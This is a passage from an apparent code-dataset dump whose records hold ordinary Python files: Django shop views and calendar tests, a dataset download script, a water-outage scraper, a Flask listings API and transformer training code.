"models.Category", "line_number": 106, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 108, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 108, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 108, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 110, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 110, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 110, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 110, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 116, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 116, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 122, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 122, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 122, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 122, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 125, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 125, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 125, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 125, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 137, "usage_type": "call"}, {"api_name": "models.ProductType.objects.filter", "line_number": 143, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 143, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 143, "usage_type": "name"}, {"api_name": "django.core.serializers.serialize", "line_number": 147, "usage_type": "call"}, {"api_name": "django.core.serializers", "line_number": 147, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 150, "usage_type": "call"}, {"api_name": "django.template.Library", "line_number": 154, "usage_type": "call"}, {"api_name": "django.template", "line_number": 154, "usage_type": "name"}, {"api_name": "models.Product.objects.filter", "line_number": 162, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 162, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 162, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 162, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 163, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 164, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 164, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 164, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 166, "usage_type": "call"}, {"api_name": "models.Product.objects.filter", "line_number": 172, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 172, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 172, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 172, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 173, "usage_type": "call"}, {"api_name": "models.ProductType.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "models.ProductType.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "models.ProductType", "line_number": 174, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 199, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 202, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 203, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 203, "usage_type": "argument"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 213, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 213, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 213, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 219, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 222, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 224, "usage_type": "name"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 232, "usage_type": "call"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 237, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 239, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 241, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 242, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 247, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 253, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 260, "usage_type": "call"}, {"api_name": "models.Product.objects.get_object_or_404get", "line_number": 266, "usage_type": "call"}, {"api_name": "models.Product.objects", "line_number": 266, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 266, "usage_type": "name"}, {"api_name": "models.ProductSpecificationValue.objects.filter", "line_number": 272, "usage_type": "call"}, {"api_name": "models.ProductSpecificationValue.objects", "line_number": 272, "usage_type": "attribute"}, {"api_name": "models.ProductSpecificationValue", "line_number": 272, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 276, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 276, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 276, "usage_type": "name"}, {"api_name": "models.Comments.objects.create", "line_number": 282, "usage_type": "call"}, {"api_name": "models.Comments.objects", "line_number": 282, "usage_type": "attribute"}, {"api_name": "models.Comments", "line_number": 282, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 287, "usage_type": "call"}, {"api_name": "django.core.paginator.Paginator", "line_number": 293, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 296, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 298, "usage_type": "name"}, {"api_name": "random.sample", "line_number": 309, "usage_type": "call"}, {"api_name": "apps.communication.forms.NewCommentForm", "line_number": 317, "usage_type": "call"}, {"api_name": "forms.AddToCartForm", "line_number": 318, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 320, "usage_type": "call"}, {"api_name": "apps.cart.cart.Cart", "line_number": 329, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 335, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 335, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 337, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 337, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 338, "usage_type": "call"}, {"api_name": "forms.AddCategoryForm", "line_number": 346, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 351, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 351, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 351, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 353, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 354, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 356, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 342, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 359, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 359, "usage_type": "argument"}, {"api_name": "django.shortcuts.render", "line_number": 360, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 365, "usage_type": "call"}, {"api_name": "models.Category", "line_number": 365, "usage_type": "argument"}, {"api_name": "models.Product.objects.filter", "line_number": 366, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 367, "usage_type": "argument"}, {"api_name": "models.Product.objects", "line_number": 366, "usage_type": "attribute"}, {"api_name": "models.Product", "line_number": 366, "usage_type": "name"}, {"api_name": "models.Category.objects.get", "line_number": 367, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 367, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 367, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 369, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 375, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 375, "usage_type": "argument"}, {"api_name": "django.http.JsonResponse", "line_number": 385, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 372, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 392, "usage_type": "call"}, {"api_name": "models.Product", "line_number": 392, "usage_type": "argument"}, {"api_name": "django.contrib.messages.success", "line_number": 396, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 396, "usage_type": "name"}, {"api_name": "django.http.JsonResponse", "line_number": 397, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 388, "usage_type": "name"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 404, "usage_type": "call"}, {"api_name": "django.utils.text.slugify", "line_number": 411, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 413, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 417, "usage_type": "call"}, {"api_name": "apps.vendor.forms.ProductForm", "line_number": 419, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 420, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 400, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 426, "usage_type": "call"}, {"api_name": "models.Category.objects.create", "line_number": 431, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 431, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 431, "usage_type": "name"}, {"api_name": "forms.AddCategoryForm", "line_number": 433, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 434, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 436, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 422, "usage_type": "name"}]}
+{"seq_id": "73946671847", "text": "import argparse\nimport pathlib\nimport shutil\nimport urllib.request\nimport tarfile\nimport tempfile\nimport time\n\nglobal start_time\n\n\ndef progress(count, block_size, total_size):\n global start_time\n if count == 0:\n start_time = time.time()\n return\n duration = time.time() - start_time\n progress_size = int(count * block_size)\n speed = int(progress_size / (1024 * duration))\n percent = int(count * block_size * 100 / total_size)\n print(\"%d%%, %d MB, %d KB/s, total time: %d seconds\" % (percent, progress_size / (1024 * 1024), speed, duration), end=\"\\r\")\n\n\ndef unpack(tarname: pathlib.Path, destination: pathlib.Path):\n # recursive function to unpack all tar.gz files in a directory\n print(\"unpacking \", tarname, destination)\n if tarname.suffixes != [\".tar\", \".gz\"]:\n # stop if this is not a compressed directory\n return\n tar = tarfile.open(tarname, \"r:gz\")\n tar.extractall(path=destination)\n tar.close()\n\n # for each file in destination: call unpack again\n outdir = destination / tarname.name.replace(\".tar.gz\", \"\")\n\n for file in outdir.iterdir():\n unpack(file, outdir)\n\n\ndef move_and_unpack_data(tmpdir: pathlib.Path, src_dir: str, filename: str, unpack_data: bool):\n data_src = tmpdir / src_dir / filename\n data_dst = pathlib.Path(\".\")\n shutil.copy(data_src, data_dst)\n\n if unpack_data:\n unpack(data_dst / filename, data_dst.parent)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--unpack\",\n help=\"If set, unpack all compressed subdirectories as well. This will require approx. 30 GB of disk space.\",\n action=\"store_true\"\n )\n\n unpack_data = parser.parse_args().unpack\n download_path = \"https://cme.h-its.org/exelixis/material/simulation_study.tar.gz\"\n\n with tempfile.TemporaryDirectory() as tmpdir:\n print(\"Downloading data from \", download_path)\n filename, _ = urllib.request.urlretrieve(url=download_path, reporthook=progress)\n\n print(\"\\nUnpacking data\")\n tar = tarfile.open(filename, \"r:gz\")\n tar.extractall(path=tmpdir)\n tar.close()\n\n tmpdir = pathlib.Path(tmpdir)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data\", filename=\"input_data.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"dataframes.tar.gz\", unpack_data=unpack_data)\n move_and_unpack_data(tmpdir=tmpdir, src_dir=\"supplementary_data/GBT\", filename=\"training_results.tar.gz\", unpack_data=unpack_data)\n", "repo_name": "tschuelia/SimulationStudy", "sub_path": "download_data.py", "file_name": "download_data.py", "file_ext": "py", "file_size_in_byte": 2600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.time", "line_number": 17, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "tarfile.open", "line_number": 30, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 43, "usage_type": "call"}, {"api_name": "shutil.copy", "line_number": 44, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 51, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 61, "usage_type": "call"}, {"api_name": "urllib.request.request.urlretrieve", "line_number": 63, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 63, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 63, "usage_type": "name"}, {"api_name": "tarfile.open", "line_number": 66, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 70, "usage_type": "call"}]}
+{"seq_id": "5948266579", "text": "from datetime import datetime\nfrom urllib.parse import urljoin\nfrom app.scrapers.base import AbstractProvider\n\n\n# TODO: unify scrapping and parsing\n\nclass GWP(AbstractProvider):\n \"\"\"GWP water provider class\"\"\"\n\n TYPE = 'water'\n ROOT_URL = 'https://www.gwp.ge'\n URLS = [\n {\"url\": urljoin(ROOT_URL, '/ka/dagegmili'), \"emergency\": False},\n {\"url\": urljoin(ROOT_URL, '/ka/gadaudebeli'), \"emergency\": True}\n ]\n\n async def scrap_notifications(self) -> list:\n \"\"\"Scraps notifications based on their type from webpage\"\"\"\n\n notifications = []\n\n for item in self.URLS:\n url = item.get(\"url\")\n emergency = item.get(\"emergency\")\n soup = await self.request_soup(url)\n outages_table = soup.find(\"table\", {\"class\": \"samushaoebi\"})\n outages_blocks = outages_table.find_all('tr')\n\n for item in outages_blocks:\n date = datetime.strptime(item.find(\"span\", {\"style\": \"color:#f00000\"}).text, \"%d/%m/%Y\")\n\n if date >= datetime.now().replace(hour=0, minute=0, second=0, microsecond=0):\n title = item.find_all(\"a\")[1].get_text(strip=True)\n link = urljoin(self.ROOT_URL, item.a.get(\"href\"))\n notifications.append(\n {\n \"type\": self.TYPE,\n \"date\": date.strftime(\"%Y-%m-%d\"),\n \"title\": title,\n \"emergency\": emergency,\n \"link\": link,\n }\n )\n\n return notifications\n\n async def parse_notifications_info(self, notifications: list) -> list: # noqa: C901\n \"\"\"Parses info from notifications\"\"\"\n\n notifications_info = []\n\n for notification in notifications:\n\n url = notification.get('link')\n soup = await self.request_soup(url)\n\n type = notification.get(\"type\")\n date = notification.get('date')\n title = notification.get('title')\n\n emergency = notification.get(\"emergency\")\n\n # For emergency outages\n\n if emergency:\n outage_text = soup.css.select(\".initial > ul > li > p\")\n for i in outage_text:\n if i.get_text(strip=True) != '':\n info = i.get_text(strip=True).replace(\"\\xa0\", \" \")\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n # For planned outages\n\n else:\n outage_text = soup.css.select(\".news-details > p\")\n temp = []\n for i in outage_text:\n if i.get_text(strip=True) != '':\n temp.append(i.get_text(strip=True).replace(\"\\xa0\", \" \"))\n\n info = \"\".join(temp[1:-2])\n notifications_info.append(\n {\n 'date': date,\n 'type': type,\n 'emergency': emergency,\n 'title': title,\n 'info': info\n }\n )\n\n return notifications_info\n", "repo_name": "roaddust2/outages-ge-bot", "sub_path": "app/scrapers/gwp.py", "file_name": "gwp.py", "file_ext": "py", "file_size_in_byte": 3524, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "app.scrapers.base.AbstractProvider", "line_number": 8, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 14, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}, {"api_name": "urllib.parse.urljoin", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "14196435929", "text": "from django.test import TestCase\nfrom django.utils import timezone\nfrom util.factories import CalendarFactory, EventFactory\n\n\nclass CalendarTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_default(self):\n # Ensure default calendar exists when user profile is created\n self.assertIsNotNone(self.calendar)\n\n # Test the default values of the calendar are correct\n self.assertEqual(self.calendar.owner, self.profile)\n self.assertEqual(self.calendar.privacy, 0)\n self.assertEqual(str(self.calendar),\n str(self.profile) + ' -> ' + self.calendar.title)\n\n def test_create(self):\n # Valid data for calendar creation\n data = {\n 'owner': self.profile,\n 'title': 'Personal',\n 'color': '#420BAE',\n 'privacy': 420\n }\n\n # Create the calendar with the given data\n calendar = CalendarFactory(\n owner=data['owner'],\n title=data['title'],\n color=data['color'],\n privacy=data['privacy']\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(calendar, field))\n\n\nclass EventTestCase(TestCase):\n\n def setUp(self):\n self.calendar = CalendarFactory()\n self.profile = self.calendar.owner\n\n def test_create(self):\n # Valid data for an event\n data = {\n 'calendar': self.calendar,\n 'title': \"JoJo's Bizarre Adventure\",\n 'start': timezone.now(),\n 'end': timezone.now() + timezone.timedelta(hours=5),\n 'location': 'Great Britain',\n 'description': \"JoJo's Bizarre Adventure tells the story of \"\n \"the Joestar family, a family whose various members \"\n \"discover they are destined to take down supernatural \"\n \"foes using unique powers that they find they possess.\"\n }\n\n # Create the event\n event = EventFactory(\n calendar=data['calendar'],\n title=data['title'],\n start=data['start'],\n end=data['end'],\n location=data['location'],\n description=data['description'],\n )\n\n # Try accessing all the fields, ensure they're correct\n for field in data:\n self.assertEqual(data[field], getattr(event, field))\n\n # Serialize the event\n serialized_data = event.serialize()\n\n # Ensure serialized data is correct\n for field in data:\n # Start and end times should be formatted\n if field == 'start':\n self.assertEqual(event.start.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'end':\n self.assertEqual(event.end.strftime('%Y-%m-%dT%H:%M:%S'),\n serialized_data[field])\n elif field == 'calendar':\n pass\n else:\n self.assertEqual(getattr(event, field), serialized_data[field])\n\n # Test unicode representation\n self.assertEqual(\n \"%s -> %s : %s -> %s\" % (event.calendar, event.title, event.start, event.end,),\n unicode(event)\n )\n\n def test_interval(self):\n event = EventFactory()\n interval = event.as_interval\n self.assertEqual(event.start, interval.start)\n self.assertEqual(event.end, interval.end)\n\n def test_happens_when(self):\n now = timezone.now()\n onehr = timezone.timedelta(hours=1)\n\n # Test in range\n inrange = EventFactory(\n start=now - onehr,\n end=now + onehr,\n )\n self.assertTrue(inrange.happens_when(now))\n\n # Test before\n before = EventFactory(\n start=now - 2 * onehr,\n end=now - onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge before\n before = EventFactory(\n start=now - onehr,\n end=now,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test after\n before = EventFactory(\n start=now + onehr,\n end=now + 2 * onehr,\n )\n self.assertFalse(before.happens_when(now))\n\n # Test edge after\n before = EventFactory(\n start=now,\n end=now + onehr,\n )\n self.assertFalse(before.happens_when(now))\n", "repo_name": "sudo-woodo/hitmeup", "sub_path": "ourcalendar/tests/test_models.py", "file_name": "test_models.py", "file_ext": "py", "file_size_in_byte": 4612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.test.TestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 9, "usage_type": "call"}, {"api_name": "util.factories.CalendarFactory", "line_number": 32, "usage_type": "call"}, {"api_name": "django.test.TestCase", "line_number": 44, "usage_type": "name"}, {"api_name": "util.factories.CalendarFactory", "line_number": 47, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 55, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 55, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 56, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 56, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 65, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 102, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 108, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 108, "usage_type": "name"}, {"api_name": "django.utils.timezone.timedelta", "line_number": 109, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 109, "usage_type": "name"}, {"api_name": "util.factories.EventFactory", "line_number": 112, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 119, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 126, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 133, "usage_type": "call"}, {"api_name": "util.factories.EventFactory", "line_number": 140, "usage_type": "call"}]}
+{"seq_id": "36953897908", "text": "import os\nimport dumper\nfrom flask import Flask, jsonify, request\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom geojson import Feature, Point, FeatureCollection\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = os.environ['DATABASE_URL']\ndb = SQLAlchemy(app)\ndb.reflect()\n\nclass Listing(db.Model):\n __tablename__ = 'listings'\n\nfeat_props= (\"id\", \"price\", \"street\", \"status\", \"bedrooms\", \"bathrooms\", \"sq_ft\")\n\n@app.route('/')\ndef hello():\n return \"Hello World!\"\n\n@app.route('/listings')\ndef listings():\n l_query= Listing.query\n min_price= request.args.get('min_price', type=int)\n if min_price is not None:\n l_query= l_query.filter(Listing.price >= min_price)\n max_price= request.args.get('max_price', type=int)\n if max_price is not None:\n l_query= l_query.filter(Listing.price <= max_price)\n\n min_bed= request.args.get('min_bed', type=int)\n if min_bed is not None:\n l_query= l_query.filter(Listing.bedrooms >= min_bed)\n max_bed= request.args.get('max_bed', type=int)\n if max_bed is not None:\n l_query= l_query.filter(Listing.bedrooms <= max_bed)\n\n min_bath= request.args.get('min_bath', type=int)\n if min_bath is not None:\n l_query= l_query.filter(Listing.bathrooms >= min_bath)\n max_bath= request.args.get('max_bath', type=int)\n if max_bath is not None:\n l_query= l_query.filter(Listing.bathrooms <= max_bath)\n\n features= list()\n for entry in l_query.all():\n feature = Feature(geometry=Point((entry.long, entry.lat)))\n feature.properties= {k:getattr(entry, k) for k in feat_props}\n features.append(feature)\n \n retcode= jsonify(FeatureCollection(features))\n return(retcode)\n\nif __name__ == '__main__':\n app.run()\n", "repo_name": "leed25d/od_listings", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1759, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Flask", "line_number": 7, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 8, "usage_type": "attribute"}, {"api_name": "flask.ext.sqlalchemy.SQLAlchemy", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 27, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 34, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 41, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 41, "usage_type": "name"}, {"api_name": "geojson.Feature", "line_number": 47, "usage_type": "call"}, {"api_name": "geojson.Point", "line_number": 47, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 51, "usage_type": "call"}, {"api_name": "geojson.FeatureCollection", "line_number": 51, "usage_type": "call"}]}
+{"seq_id": "74773847527", "text": "# See [video](https://youtu.be/kCc8FmEb1nY)\n# The colab repo is [here](https://colab.research.google.com/drive/1JMLa53HDuA-i7ZBmqV7ZnA3c_fvtXnx-?usp=sharing)\n\nimport time\nfrom pathlib import Path\n\nimport torch\nfrom torch.utils.data import DataLoader \nfrom tqdm import tqdm\n\nfrom config import get_config, get_device, get_model_folder\nfrom dataset8 import get_ds8, get_testing_ds8, Dataset8\nfrom model8 import Transformer8, build_transformer8\nfrom utils import reload_model, save_model, load_trained_model\n\n\ndef build_model8(config: dict, vocab_tgt_len: int) -> Transformer8:\n model = build_transformer8(vocab_tgt_len,\n d_model=config['d_model'], N=config['N'], h=config['h'], block_size=config['block_size'], dropout=config['dropout'], d_ff=config['d_ff'])\n return model\n\n\ndef train_model8(config: dict):\n # hyperparameters\n max_iters = 5000\n eval_interval = 100\n eval_iters = 200\n total_loss = 0\n initial_epoch = 0\n global_step = 0\n\n torch.manual_seed(1337)\n\n device = get_device()\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, exist_ok=True)\n\n train_dataloader, val_dataloader, tokenizer_tgt, train_ds, val_ds = get_ds8(config, model_folder)\n transformer = build_model8(config, tokenizer_tgt.get_vocab_size()).to(device)\n\n # print the number of parameters in the model\n print(sum(p.numel() for p in transformer.parameters())/1e6, 'M parameters')\n\n # create a PyTorch optimizer\n optimizer = torch.optim.AdamW(transformer.parameters(), lr=config['lr'])\n\n transformer, initial_epoch, optimizer, global_step = reload_model(\n config, transformer, optimizer, initial_epoch, global_step)\n\n for epoch in range(initial_epoch, config['num_epochs']):\n if (device == 'cuda'):\n torch.cuda.empty_cache()\n\n transformer.train() # moved inside for run_validation at each step\n\n batch_iterator = tqdm(train_dataloader, desc=f'Processing epoch {epoch:02d}')\n # for iter, batch in enumerate(batch_iterator):\n # if (iter == max_iters):\n # break\n for iter in range(max_iters):\n\n # every once in a while evaluate the loss on train and val sets\n if (iter % eval_interval == 0 or iter == max_iters - 1) and (iter > 0):\n losses = evaluate_model8(transformer, val_dataloader, eval_iters, device, train_ds, val_ds)\n batch_iterator.write(f\"step {iter}: train loss {losses['train']:.4f}, val loss {losses['val']:.4f}\")\n\n # sample a batch of data\n # xb, yb = batch\n xb, yb = train_ds.get_batch()\n\n # evaluate the loss\n logits, loss = transformer(xb.to(device), yb.to(device))\n optimizer.zero_grad(set_to_none=True)\n loss.backward()\n optimizer.step()\n\n # Save the model at the end of every epoch\n save_model(config, transformer, optimizer, epoch, global_step)\n\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer_tgt.decode(transformer.generate(context, max_new_tokens=2000)[0].tolist()))\n\n\n@torch.no_grad()\ndef evaluate_model8(transformer: Transformer8, val_dataloader: DataLoader, eval_iters: int, device, train_ds: Dataset8, val_ds: Dataset8):\n\n out = {'train':0, 'val': 0}\n transformer.eval()\n\n tmp = {'train':train_ds, 'val': val_ds}\n for key, value in tmp.items():\n losses = torch.zeros(eval_iters)\n for k in range(eval_iters):\n X, Y = value.get_batch()\n logits, loss = transformer(X.to(device), Y.to(device))\n losses[k] = loss.item()\n out[key] = losses.mean()\n\n # losses = torch.zeros(eval_iters)\n # for k, batch in enumerate(val_dataloader):\n # if k == eval_iters:\n # break\n # X, Y = batch\n # logits, loss = transformer(X.to(device), Y.to(device))\n # losses[k] = loss.item()\n # out['val'] = losses.mean()\n\n transformer.train()\n return out\n\ndef translate8(config: dict, sentence: str):\n device = get_device()\n\n model_folder = get_model_folder(config)\n if not Path.exists(Path(model_folder)):\n raise ValueError(f\"{model_folder} model_folder does not exist\")\n\n tokenizer = get_testing_ds8(config, model_folder)\n model = build_model8(config, tokenizer.get_vocab_size()).to(device)\n\n # Load the pretrained weights\n model = load_trained_model(config, model)\n\n # generate from the model\n context = torch.zeros((1, 1), dtype=torch.long, device=device)\n print(tokenizer.decode(model.generate(context, max_new_tokens=2000)[0].tolist()))\n\ndef debug_code_model8(config: dict, device):\n config['model'] = \"model7\"\n config['datasource'] = \"translate\"\n config['lang_src'] = \"en\"\n config['lang_tgt'] = \"fr\"\n\n model_folder = get_model_folder(config)\n Path(model_folder).mkdir(parents=True, 